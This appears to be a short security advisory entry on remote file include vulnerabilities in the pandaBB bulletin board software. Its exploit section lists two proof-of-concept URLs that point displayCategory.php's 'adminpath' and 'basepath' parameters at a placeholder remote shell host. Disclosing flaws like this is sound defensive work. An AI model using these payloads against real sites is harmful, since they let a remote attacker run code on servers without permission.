pandaBB Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

pandaBB Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://sh3ll
http://www.example.com/pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://sh3ll